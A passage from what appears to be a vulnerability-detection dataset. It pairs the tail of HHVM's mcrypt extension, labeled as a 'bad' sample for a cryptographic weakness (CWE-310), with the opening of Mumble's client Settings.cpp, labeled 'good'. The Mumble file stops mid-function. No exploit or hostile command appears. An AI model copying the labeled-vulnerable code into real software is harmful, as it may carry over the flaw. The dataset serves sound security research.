case -1:
default:
raise_warning("Unknown error");
break;
}
}
pm->m_init = true;
free(iv_s);
free(key_s);
return result;
}
Variant HHVM_FUNCTION(mcrypt_generic, const Resource& td, const String& data) {
return mcrypt_generic(td, data, false);
}
Variant HHVM_FUNCTION(mdecrypt_generic, const Resource& td,
const String& data) {
return mcrypt_generic(td, data, true);
}
bool HHVM_FUNCTION(mcrypt_generic_deinit, const Resource& td) {
MCrypt *pm = td.getTyped<MCrypt>();
if (mcrypt_generic_deinit(pm->m_td) < 0) {
raise_warning("Could not terminate encryption specifier");
return false;
}
pm->m_init = false;
return true;
}
bool HHVM_FUNCTION(mcrypt_generic_end, const Resource& td) {
return HHVM_FUNCTION(mcrypt_generic_deinit, td);
}
///////////////////////////////////////////////////////////////////////////////
const StaticString s_MCRYPT_3DES("MCRYPT_3DES");
const StaticString s_MCRYPT_ARCFOUR("MCRYPT_ARCFOUR");
const StaticString s_MCRYPT_ARCFOUR_IV("MCRYPT_ARCFOUR_IV");
const StaticString s_MCRYPT_BLOWFISH("MCRYPT_BLOWFISH");
const StaticString s_MCRYPT_BLOWFISH_COMPAT("MCRYPT_BLOWFISH_COMPAT");
const StaticString s_MCRYPT_CAST_128("MCRYPT_CAST_128");
const StaticString s_MCRYPT_CAST_256("MCRYPT_CAST_256");
const StaticString s_MCRYPT_CRYPT("MCRYPT_CRYPT");
const StaticString s_MCRYPT_DECRYPT("MCRYPT_DECRYPT");
const StaticString s_MCRYPT_DES("MCRYPT_DES");
const StaticString s_MCRYPT_DEV_RANDOM("MCRYPT_DEV_RANDOM");
const StaticString s_MCRYPT_DEV_URANDOM("MCRYPT_DEV_URANDOM");
const StaticString s_MCRYPT_ENCRYPT("MCRYPT_ENCRYPT");
const StaticString s_MCRYPT_ENIGNA("MCRYPT_ENIGNA");
const StaticString s_MCRYPT_GOST("MCRYPT_GOST");
const StaticString s_MCRYPT_IDEA("MCRYPT_IDEA");
const StaticString s_MCRYPT_LOKI97("MCRYPT_LOKI97");
const StaticString s_MCRYPT_MARS("MCRYPT_MARS");
const StaticString s_MCRYPT_MODE_CBC("MCRYPT_MODE_CBC");
const StaticString s_MCRYPT_MODE_CFB("MCRYPT_MODE_CFB");
const StaticString s_MCRYPT_MODE_ECB("MCRYPT_MODE_ECB");
const StaticString s_MCRYPT_MODE_NOFB("MCRYPT_MODE_NOFB");
const StaticString s_MCRYPT_MODE_OFB("MCRYPT_MODE_OFB");
const StaticString s_MCRYPT_MODE_STREAM("MCRYPT_MODE_STREAM");
const StaticString s_MCRYPT_PANAMA("MCRYPT_PANAMA");
const StaticString s_MCRYPT_RAND("MCRYPT_RAND");
const StaticString s_MCRYPT_RC2("MCRYPT_RC2");
const StaticString s_MCRYPT_RC6("MCRYPT_RC6");
const StaticString s_MCRYPT_RIJNDAEL_128("MCRYPT_RIJNDAEL_128");
const StaticString s_MCRYPT_RIJNDAEL_192("MCRYPT_RIJNDAEL_192");
const StaticString s_MCRYPT_RIJNDAEL_256("MCRYPT_RIJNDAEL_256");
const StaticString s_MCRYPT_SAFER128("MCRYPT_SAFER128");
const StaticString s_MCRYPT_SAFER64("MCRYPT_SAFER64");
const StaticString s_MCRYPT_SAFERPLUS("MCRYPT_SAFERPLUS");
const StaticString s_MCRYPT_SERPENT("MCRYPT_SERPENT");
const StaticString s_MCRYPT_SKIPJACK("MCRYPT_SKIPJACK");
const StaticString s_MCRYPT_THREEWAY("MCRYPT_THREEWAY");
const StaticString s_MCRYPT_TRIPLEDES("MCRYPT_TRIPLEDES");
const StaticString s_MCRYPT_TWOFISH("MCRYPT_TWOFISH");
const StaticString s_MCRYPT_WAKE("MCRYPT_WAKE");
const StaticString s_MCRYPT_XTEA("MCRYPT_XTEA");
class McryptExtension : public Extension {
public:
McryptExtension() : Extension("mcrypt") {}
virtual void moduleInit() {
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_3DES.get(), StaticString("tripledes").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_ARCFOUR.get(), StaticString("arcfour").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_ARCFOUR_IV.get(), StaticString("arcfour-iv").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_BLOWFISH.get(), StaticString("blowfish").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_BLOWFISH_COMPAT.get(), StaticString("blowfish-compat").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_CAST_128.get(), StaticString("cast-128").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_CAST_256.get(), StaticString("cast-256").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_CRYPT.get(), StaticString("crypt").get()
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_DECRYPT.get(), 1
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_DES.get(), StaticString("des").get()
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_DEV_RANDOM.get(), RANDOM
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_DEV_URANDOM.get(), URANDOM
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_ENCRYPT.get(), 0
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_ENIGNA.get(), StaticString("crypt").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_GOST.get(), StaticString("gost").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_IDEA.get(), StaticString("idea").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_LOKI97.get(), StaticString("loki97").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MARS.get(), StaticString("mars").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_CBC.get(), StaticString("cbc").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_CFB.get(), StaticString("cfb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_ECB.get(), StaticString("ecb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_NOFB.get(), StaticString("nofb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_OFB.get(), StaticString("ofb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_STREAM.get(), StaticString("stream").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_PANAMA.get(), StaticString("panama").get()
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_RAND.get(), RAND
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RC2.get(), StaticString("rc2").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RC6.get(), StaticString("rc6").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RIJNDAEL_128.get(), StaticString("rijndael-128").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RIJNDAEL_192.get(), StaticString("rijndael-192").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RIJNDAEL_256.get(), StaticString("rijndael-256").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SAFER128.get(), StaticString("safer-sk128").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SAFER64.get(), StaticString("safer-sk64").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SAFERPLUS.get(), StaticString("saferplus").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SERPENT.get(), StaticString("serpent").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SKIPJACK.get(), StaticString("skipjack").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_THREEWAY.get(), StaticString("threeway").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_TRIPLEDES.get(), StaticString("tripledes").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_TWOFISH.get(), StaticString("twofish").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_WAKE.get(), StaticString("wake").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_XTEA.get(), StaticString("xtea").get()
);
HHVM_FE(mcrypt_module_open);
HHVM_FE(mcrypt_module_close);
HHVM_FE(mcrypt_list_algorithms);
HHVM_FE(mcrypt_list_modes);
HHVM_FE(mcrypt_module_get_algo_block_size);
HHVM_FE(mcrypt_module_get_algo_key_size);
HHVM_FE(mcrypt_module_get_supported_key_sizes);
HHVM_FE(mcrypt_module_is_block_algorithm_mode);
HHVM_FE(mcrypt_module_is_block_algorithm);
HHVM_FE(mcrypt_module_is_block_mode);
HHVM_FE(mcrypt_module_self_test);
HHVM_FE(mcrypt_create_iv);
HHVM_FE(mcrypt_encrypt);
HHVM_FE(mcrypt_decrypt);
HHVM_FE(mcrypt_cbc);
HHVM_FE(mcrypt_cfb);
HHVM_FE(mcrypt_ecb);
HHVM_FE(mcrypt_ofb);
HHVM_FE(mcrypt_get_block_size);
HHVM_FE(mcrypt_get_cipher_name);
HHVM_FE(mcrypt_get_iv_size);
HHVM_FE(mcrypt_get_key_size);
HHVM_FE(mcrypt_enc_get_algorithms_name);
HHVM_FE(mcrypt_enc_get_block_size);
HHVM_FE(mcrypt_enc_get_iv_size);
HHVM_FE(mcrypt_enc_get_key_size);
HHVM_FE(mcrypt_enc_get_modes_name);
HHVM_FE(mcrypt_enc_get_supported_key_sizes);
HHVM_FE(mcrypt_enc_is_block_algorithm_mode);
HHVM_FE(mcrypt_enc_is_block_algorithm);
HHVM_FE(mcrypt_enc_is_block_mode);
HHVM_FE(mcrypt_enc_self_test);
HHVM_FE(mcrypt_generic_init);
HHVM_FE(mcrypt_generic);
HHVM_FE(mdecrypt_generic);
HHVM_FE(mcrypt_generic_deinit);
HHVM_FE(mcrypt_generic_end);
loadSystemlib();
}
} s_mcrypt_extension;
///////////////////////////////////////////////////////////////////////////////
}
| ./CrossVul/dataset_final_sorted/CWE-310/cpp/bad_2259_0 |
crossvul-cpp_data_good_3579_1 | /* Copyright (C) 2005-2011, Thorvald Natvig <thorvald@natvig.com>
Copyright (C) 2009-2011, Stefan Hacker <dd0t@users.sourceforge.net>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
- Neither the name of the Mumble Developers nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "Settings.h"
#include "Log.h"
#include "Global.h"
#include "AudioInput.h"
#include "Cert.h"
#include "../../overlay/overlay.h"
#include "../../overlay/overlay_blacklist.h"
bool Shortcut::isServerSpecific() const {
if (qvData.canConvert<ShortcutTarget>()) {
const ShortcutTarget &sc = qvariant_cast<ShortcutTarget> (qvData);
return sc.isServerSpecific();
}
return false;
}
bool Shortcut::operator < (const Shortcut &other) const {
return (iIndex < other.iIndex);
}
bool Shortcut::operator == (const Shortcut &other) const {
return (iIndex == other.iIndex) && (qlButtons == other.qlButtons) && (qvData == other.qvData) && (bSuppress == other.bSuppress);
}
ShortcutTarget::ShortcutTarget() {
bUsers = true;
iChannel = -3;
bLinks = bChildren = bForceCenter = false;
}
bool ShortcutTarget::isServerSpecific() const {
return (! bUsers && (iChannel >= 0));
}
bool ShortcutTarget::operator == (const ShortcutTarget &o) const {
if ((bUsers != o.bUsers) || (bForceCenter != o.bForceCenter))
return false;
if (bUsers)
return (qlUsers == o.qlUsers) && (qlSessions == o.qlSessions);
else
return (iChannel == o.iChannel) && (bLinks == o.bLinks) && (bChildren == o.bChildren) && (qsGroup == o.qsGroup);
}
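// Hash a ShortcutTarget so it can be used as a key in Qt hash-based
// containers: user targets fold the session ids into the hash, channel
// targets combine the channel id, link/children flags and the ACL group.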
quint32 qHash(const ShortcutTarget &t) {
quint32 h = t.bForceCenter ? 0x55555555 : 0xaaaaaaaa;
if (t.bUsers) {
foreach(unsigned int u, t.qlSessions)
h ^= u;
} else {
h ^= t.iChannel;
if (t.bLinks)
h ^= 0x80000000;
if (t.bChildren)
h ^= 0x40000000;
h ^= qHash(t.qsGroup);
h = ~h;
}
return h;
}
quint32 qHash(const QList<ShortcutTarget> &l) {
quint32 h = l.count();
foreach(const ShortcutTarget &st, l)
h ^= qHash(st);
return h;
}
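// Stream operators so a ShortcutTarget can be serialized through QVariant
// (e.g. into QSettings); only the fields relevant for the target kind
// (users vs. channel) are written.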
QDataStream &operator<< (QDataStream &qds, const ShortcutTarget &st) {
qds << st.bUsers << st.bForceCenter;
if (st.bUsers)
return qds << st.qlUsers;
else
return qds << st.iChannel << st.qsGroup << st.bLinks << st.bChildren;
}
QDataStream &operator>> (QDataStream &qds, ShortcutTarget &st) {
qds >> st.bUsers >> st.bForceCenter;
if (st.bUsers)
return qds >> st.qlUsers;
else
return qds >> st.iChannel >> st.qsGroup >> st.bLinks >> st.bChildren;
}
const QString Settings::cqsDefaultPushClickOn = QLatin1String(":/on.ogg");
const QString Settings::cqsDefaultPushClickOff = QLatin1String(":/off.ogg");
OverlaySettings::OverlaySettings() {
bEnable = true;
fX = 1.0f;
fY = 0.0f;
fZoom = 0.875f;
#ifdef Q_OS_MAC
qsStyle = QLatin1String("Cleanlooks");
#endif
osShow = LinkedChannels;
bAlwaysSelf = true;
uiActiveTime = 5;
osSort = Alphabetical;
qcUserName[Settings::Passive] = QColor(170, 170, 170);
qcUserName[Settings::Talking] = QColor(255, 255, 255);
qcUserName[Settings::Whispering] = QColor(128, 255, 128);
qcUserName[Settings::Shouting] = QColor(255, 128, 255);
qcChannel = QColor(255, 255, 128);
qcBoxPen = QColor(0, 0, 0, 224);
qcBoxFill = QColor(0, 0, 0);
setPreset();
// FPS display settings
qcFps = Qt::white;
fFps = 0.75f;
qfFps = qfUserName;
qrfFps = QRectF(10, 10, -1, 0.023438f);
bFps = false;
bUseWhitelist = false;
#ifdef Q_OS_WIN
int i = 0;
while (overlayBlacklist[i]) {
qslBlacklist << QLatin1String(overlayBlacklist[i]);
i++;
}
#endif
}
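// Apply one of the built-in overlay layout presets by filling in fonts,
// colours, rectangles and visibility flags for the chosen preset.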
void OverlaySettings::setPreset(const OverlayPresets preset) {
switch (preset) {
case LargeSquareAvatar:
uiColumns = 2;
fUserName = 0.75f;
fChannel = 0.75f;
fMutedDeafened = 0.5f;
fAvatar = 1.0f;
#if defined(Q_OS_WIN) || defined(Q_OS_MAC)
qfUserName = QFont(QLatin1String("Verdana"), 20);
#else
qfUserName = QFont(QLatin1String("Arial"), 20);
#endif
qfChannel = qfUserName;
fUser[Settings::Passive] = 0.5f;
fUser[Settings::Talking] = (7.0f / 8.0f);
fUser[Settings::Whispering] = (7.0f / 8.0f);
fUser[Settings::Shouting] = (7.0f / 8.0f);
qrfUserName = QRectF(-0.0625f, 0.101563f - 0.0625f, 0.125f, 0.023438f);
qrfChannel = QRectF(-0.03125f, -0.0625f, 0.09375f, 0.015625f);
qrfMutedDeafened = QRectF(-0.0625f, -0.0625f, 0.0625f, 0.0625f);
qrfAvatar = QRectF(-0.0625f, -0.0625f, 0.125f, 0.125f);
fBoxPenWidth = (1.f / 256.0f);
fBoxPad = (1.f / 256.0f);
bUserName = true;
bChannel = true;
bMutedDeafened = true;
bAvatar = true;
bBox = false;
qaUserName = Qt::AlignCenter;
qaMutedDeafened = Qt::AlignLeft | Qt::AlignTop;
qaAvatar = Qt::AlignCenter;
qaChannel = Qt::AlignCenter;
break;
case AvatarAndName:
default:
uiColumns = 1;
fUserName = 1.0f;
fChannel = (7.0f / 8.0f);
fMutedDeafened = (7.0f / 8.0f);
fAvatar = 1.0f;
#if defined(Q_OS_WIN) || defined(Q_OS_MAC)
qfUserName = QFont(QLatin1String("Verdana"), 20);
#else
qfUserName = QFont(QLatin1String("Arial"), 20);
#endif
qfChannel = qfUserName;
fUser[Settings::Passive] = 0.5f;
fUser[Settings::Talking] = (7.0f / 8.0f);
fUser[Settings::Whispering] = (7.0f / 8.0f);
fUser[Settings::Shouting] = (7.0f / 8.0f);
qrfUserName = QRectF(0.015625f, -0.015625f, 0.250f, 0.03125f);
qrfChannel = QRectF(0.03125f, -0.015625f, 0.1875f, 0.015625f);
qrfMutedDeafened = QRectF(0.234375f, -0.015625f, 0.03125f, 0.03125f);
qrfAvatar = QRectF(-0.03125f, -0.015625f, 0.03125f, 0.03125f);
fBoxPenWidth = 0.0f;
fBoxPad = (1.f / 256.0f);
bUserName = true;
bChannel = false;
bMutedDeafened = true;
bAvatar = true;
bBox = true;
qaUserName = Qt::AlignLeft | Qt::AlignVCenter;
qaMutedDeafened = Qt::AlignRight | Qt::AlignVCenter;
qaAvatar = Qt::AlignRight | Qt::AlignVCenter;
qaChannel = Qt::AlignLeft | Qt::AlignTop;
break;
}
}
Settings::Settings() {
qRegisterMetaType<ShortcutTarget> ("ShortcutTarget");
qRegisterMetaTypeStreamOperators<ShortcutTarget> ("ShortcutTarget");
qRegisterMetaType<QVariant> ("QVariant");
atTransmit = VAD;
bTransmitPosition = false;
bMute = bDeaf = false;
bTTS = true;
bTTSMessageReadBack = false;
iTTSVolume = 75;
iTTSThreshold = 250;
iQuality = 40000;
fVolume = 1.0f;
fOtherVolume = 0.5f;
bAttenuateOthersOnTalk = false;
bAttenuateOthers = true;
iMinLoudness = 1000;
iVoiceHold = 50;
iJitterBufferSize = 1;
iFramesPerPacket = 2;
iNoiseSuppress = -30;
iIdleTime = 0;
vsVAD = Amplitude;
fVADmin = 0.80f;
fVADmax = 0.98f;
bTxAudioCue = false;
qsTxAudioCueOn = cqsDefaultPushClickOn;
qsTxAudioCueOff = cqsDefaultPushClickOff;
bUserTop = false;
bWhisperFriends = false;
uiDoublePush = 0;
bExpert = false;
#ifdef NO_UPDATE_CHECK
bUpdateCheck = false;
bPluginOverlayCheck = false;
#else
bUpdateCheck = true;
bPluginOverlayCheck = true;
#endif
qsImagePath = QDesktopServices::storageLocation(QDesktopServices::PicturesLocation);
ceExpand = ChannelsWithUsers;
ceChannelDrag = Ask;
bMinimalView = false;
bHideFrame = false;
aotbAlwaysOnTop = OnTopNever;
bAskOnQuit = true;
#ifdef Q_OS_WIN
// Don't enable minimize to tray by default on win7
bHideInTray = (QSysInfo::windowsVersion() != QSysInfo::WV_6_1);
#else
bHideInTray = true;
#endif
bStateInTray = true;
bUsage = true;
bShowUserCount = false;
wlWindowLayout = LayoutClassic;
bShowContextMenuInMenuBar = false;
ssFilter = ShowReachable;
iOutputDelay = 5;
qsALSAInput=QLatin1String("default");
qsALSAOutput=QLatin1String("default");
bEcho = false;
bEchoMulti = true;
bExclusiveInput = false;
bExclusiveOutput = false;
iPortAudioInput = -1; // default device
iPortAudioOutput = -1; // default device
bPositionalAudio = true;
bPositionalHeadphone = false;
fAudioMinDistance = 1.0f;
fAudioMaxDistance = 15.0f;
fAudioMaxDistVolume = 0.80f;
fAudioBloom = 0.5f;
iLCDUserViewMinColWidth = 50;
iLCDUserViewSplitterWidth = 2;
// PTT Button window
bShowPTTButtonWindow = false;
// Network settings
bTCPCompat = false;
bQoS = true;
bReconnect = true;
bAutoConnect = false;
ptProxyType = NoProxy;
usProxyPort = 0;
iMaxImageSize = ciDefaultMaxImageSize;
iMaxImageWidth = 1024; // Allow 1024x1024 resolution
iMaxImageHeight = 1024;
bSuppressIdentity = false;
// Accessibility
bHighContrast = false;
// Recording
qsRecordingPath = QDesktopServices::storageLocation(QDesktopServices::DocumentsLocation);
qsRecordingFile = QLatin1String("Mumble-%date-%time-%host-%user");
rmRecordingMode = RecordingMixdown;
iRecordingFormat = 0;
// Config updates
uiUpdateCounter = 0;
#if defined(AUDIO_TEST)
lmLoopMode = Server;
#else
lmLoopMode = None;
#endif
dPacketLoss = 0;
dMaxPacketDelay = 0.0f;
iMaxLogBlocks = 0;
for (int i=Log::firstMsgType; i<=Log::lastMsgType; ++i)
qmMessages.insert(i, Settings::LogConsole | Settings::LogBalloon | Settings::LogTTS);
for (int i=Log::firstMsgType; i<=Log::lastMsgType; ++i)
qmMessageSounds.insert(i, QString());
qmMessageSounds[Log::CriticalError] = QLatin1String(":/Critical.ogg");
qmMessageSounds[Log::PermissionDenied] = QLatin1String(":/PermissionDenied.ogg");
qmMessageSounds[Log::SelfMute] = QLatin1String(":/SelfMutedDeafened.ogg");
qmMessageSounds[Log::ServerConnected] = QLatin1String(":/ServerConnected.ogg");
qmMessageSounds[Log::ServerDisconnected] = QLatin1String(":/ServerDisconnected.ogg");
qmMessageSounds[Log::TextMessage] = QLatin1String(":/TextMessage.ogg");
qmMessageSounds[Log::ChannelJoin] = QLatin1String(":/UserJoinedChannel.ogg");
qmMessageSounds[Log::ChannelLeave] = QLatin1String(":/UserLeftChannel.ogg");
qmMessageSounds[Log::YouMutedOther] = QLatin1String(":/UserMutedYouOrByYou.ogg");
qmMessageSounds[Log::YouMuted] = QLatin1String(":/UserMutedYouOrByYou.ogg");
qmMessageSounds[Log::YouKicked] = QLatin1String(":/UserKickedYouOrByYou.ogg");
qmMessageSounds[Log::Recording] = QLatin1String(":/RecordingStateChanged.ogg");
qmMessages[Log::DebugInfo] = Settings::LogConsole;
qmMessages[Log::Warning] = Settings::LogConsole | Settings::LogBalloon;
qmMessages[Log::Information] = Settings::LogConsole;
qmMessages[Log::UserJoin] = Settings::LogConsole;
qmMessages[Log::UserLeave] = Settings::LogConsole;
qmMessages[Log::UserKicked] = Settings::LogConsole;
qmMessages[Log::OtherSelfMute] = Settings::LogConsole;
qmMessages[Log::OtherMutedOther] = Settings::LogConsole;
}
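// Echo cancellation is only reported as usable when the selected audio
// input backend says it can cancel echo against the selected output device.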
bool Settings::doEcho() const {
if (! bEcho)
return false;
if (AudioInputRegistrar::qmNew) {
AudioInputRegistrar *air = AudioInputRegistrar::qmNew->value(qsAudioInput);
if (air) {
if (air->canEcho(qsAudioOutput))
return true;
}
}
return false;
}
bool Settings::doPositionalAudio() const {
return bPositionalAudio;
}
#include BOOST_TYPEOF_INCREMENT_REGISTRATION_GROUP()
BOOST_TYPEOF_REGISTER_TYPE(Qt::Alignment)
BOOST_TYPEOF_REGISTER_TYPE(Settings::AudioTransmit)
BOOST_TYPEOF_REGISTER_TYPE(Settings::VADSource)
BOOST_TYPEOF_REGISTER_TYPE(Settings::LoopMode)
BOOST_TYPEOF_REGISTER_TYPE(Settings::OverlayShow)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ProxyType)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ChannelExpand)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ChannelDrag)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ServerShow)
BOOST_TYPEOF_REGISTER_TYPE(Settings::WindowLayout)
BOOST_TYPEOF_REGISTER_TYPE(Settings::AlwaysOnTopBehaviour)
BOOST_TYPEOF_REGISTER_TYPE(Settings::RecordingMode)
BOOST_TYPEOF_REGISTER_TYPE(QString)
BOOST_TYPEOF_REGISTER_TYPE(QByteArray)
BOOST_TYPEOF_REGISTER_TYPE(QColor)
BOOST_TYPEOF_REGISTER_TYPE(QVariant)
BOOST_TYPEOF_REGISTER_TYPE(QFont)
BOOST_TYPEOF_REGISTER_TEMPLATE(QList, 1)
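// Load-time helpers: SAVELOAD reads a key from QSettings, keeping the
// current member value as the default; LOADENUM/LOADFLAG additionally cast
// the stored integer back to the enum/flag type of the member.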
#define SAVELOAD(var,name) var = qvariant_cast<BOOST_TYPEOF(var)>(settings_ptr->value(QLatin1String(name), var))
#define LOADENUM(var, name) var = static_cast<BOOST_TYPEOF(var)>(settings_ptr->value(QLatin1String(name), var).toInt())
#define LOADFLAG(var, name) var = static_cast<BOOST_TYPEOF(var)>(settings_ptr->value(QLatin1String(name), static_cast<int>(var)).toInt())
void OverlaySettings::load() {
load(g.qs);
}
void OverlaySettings::load(QSettings* settings_ptr) {
SAVELOAD(bEnable, "enable");
LOADENUM(osShow, "show");
SAVELOAD(bAlwaysSelf, "alwaysself");
SAVELOAD(uiActiveTime, "activetime");
LOADENUM(osSort, "sort");
SAVELOAD(fX, "x");
SAVELOAD(fY, "y");
SAVELOAD(fZoom, "zoom");
SAVELOAD(uiColumns, "columns");
settings_ptr->beginReadArray(QLatin1String("states"));
for (int i=0; i<4; ++i) {
settings_ptr->setArrayIndex(i);
SAVELOAD(qcUserName[i], "color");
SAVELOAD(fUser[i], "opacity");
}
settings_ptr->endArray();
SAVELOAD(qfUserName, "userfont");
SAVELOAD(qfChannel, "channelfont");
SAVELOAD(qcChannel, "channelcolor");
SAVELOAD(qfFps, "fpsfont");
SAVELOAD(qcFps, "fpscolor");
SAVELOAD(fBoxPad, "padding");
SAVELOAD(fBoxPenWidth, "penwidth");
SAVELOAD(qcBoxPen, "pencolor");
SAVELOAD(qcBoxFill, "fillcolor");
SAVELOAD(bUserName, "usershow");
SAVELOAD(bChannel, "channelshow");
SAVELOAD(bMutedDeafened, "mutedshow");
SAVELOAD(bAvatar, "avatarshow");
SAVELOAD(bBox, "boxshow");
SAVELOAD(bFps, "fpsshow");
SAVELOAD(fUserName, "useropacity");
SAVELOAD(fChannel, "channelopacity");
SAVELOAD(fMutedDeafened, "mutedopacity");
SAVELOAD(fAvatar, "avataropacity");
SAVELOAD(fFps, "fpsopacity");
SAVELOAD(qrfUserName, "userrect");
SAVELOAD(qrfChannel, "channelrect");
SAVELOAD(qrfMutedDeafened, "mutedrect");
SAVELOAD(qrfAvatar, "avatarrect");
SAVELOAD(qrfFps, "fpsrect");
LOADFLAG(qaUserName, "useralign");
LOADFLAG(qaChannel, "channelalign");
LOADFLAG(qaMutedDeafened, "mutedalign");
LOADFLAG(qaAvatar, "avataralign");
SAVELOAD(bUseWhitelist, "usewhitelist");
SAVELOAD(qslBlacklist, "blacklist");
SAVELOAD(qslWhitelist, "whitelist");
}
void Settings::load() {
load(g.qs);
}
void Settings::load(QSettings* settings_ptr) {
// Config updates
SAVELOAD(uiUpdateCounter, "lastupdate");
SAVELOAD(bMute, "audio/mute");
SAVELOAD(bDeaf, "audio/deaf");
LOADENUM(atTransmit, "audio/transmit");
SAVELOAD(uiDoublePush, "audio/doublepush");
SAVELOAD(bTxAudioCue, "audio/pushclick");
SAVELOAD(qsTxAudioCueOn, "audio/pushclickon");
SAVELOAD(qsTxAudioCueOff, "audio/pushclickoff");
SAVELOAD(iQuality, "audio/quality");
SAVELOAD(iMinLoudness, "audio/loudness");
SAVELOAD(fVolume, "audio/volume");
SAVELOAD(fOtherVolume, "audio/othervolume");
SAVELOAD(bAttenuateOthers, "audio/attenuateothers");
SAVELOAD(bAttenuateOthersOnTalk, "audio/attenuateothersontalk");
LOADENUM(vsVAD, "audio/vadsource");
SAVELOAD(fVADmin, "audio/vadmin");
SAVELOAD(fVADmax, "audio/vadmax");
SAVELOAD(iNoiseSuppress, "audio/noisesupress");
SAVELOAD(iVoiceHold, "audio/voicehold");
SAVELOAD(iOutputDelay, "audio/outputdelay");
SAVELOAD(iIdleTime, "audio/idletime");
SAVELOAD(fAudioMinDistance, "audio/mindistance");
SAVELOAD(fAudioMaxDistance, "audio/maxdistance");
SAVELOAD(fAudioMaxDistVolume, "audio/maxdistancevolume");
SAVELOAD(fAudioBloom, "audio/bloom");
SAVELOAD(bEcho, "audio/echo");
SAVELOAD(bEchoMulti, "audio/echomulti");
SAVELOAD(bExclusiveInput, "audio/exclusiveinput");
SAVELOAD(bExclusiveOutput, "audio/exclusiveoutput");
SAVELOAD(bPositionalAudio, "audio/positional");
SAVELOAD(bPositionalHeadphone, "audio/headphone");
SAVELOAD(qsAudioInput, "audio/input");
SAVELOAD(qsAudioOutput, "audio/output");
SAVELOAD(bWhisperFriends, "audio/whisperfriends");
SAVELOAD(bTransmitPosition, "audio/postransmit");
SAVELOAD(iJitterBufferSize, "net/jitterbuffer");
SAVELOAD(iFramesPerPacket, "net/framesperpacket");
SAVELOAD(qsASIOclass, "asio/class");
SAVELOAD(qlASIOmic, "asio/mic");
SAVELOAD(qlASIOspeaker, "asio/speaker");
SAVELOAD(qsWASAPIInput, "wasapi/input");
SAVELOAD(qsWASAPIOutput, "wasapi/output");
SAVELOAD(qsALSAInput, "alsa/input");
SAVELOAD(qsALSAOutput, "alsa/output");
SAVELOAD(qsPulseAudioInput, "pulseaudio/input");
SAVELOAD(qsPulseAudioOutput, "pulseaudio/output");
SAVELOAD(qsOSSInput, "oss/input");
SAVELOAD(qsOSSOutput, "oss/output");
SAVELOAD(qsCoreAudioInput, "coreaudio/input");
SAVELOAD(qsCoreAudioOutput, "coreaudio/output");
SAVELOAD(iPortAudioInput, "portaudio/input");
SAVELOAD(iPortAudioOutput, "portaudio/output");
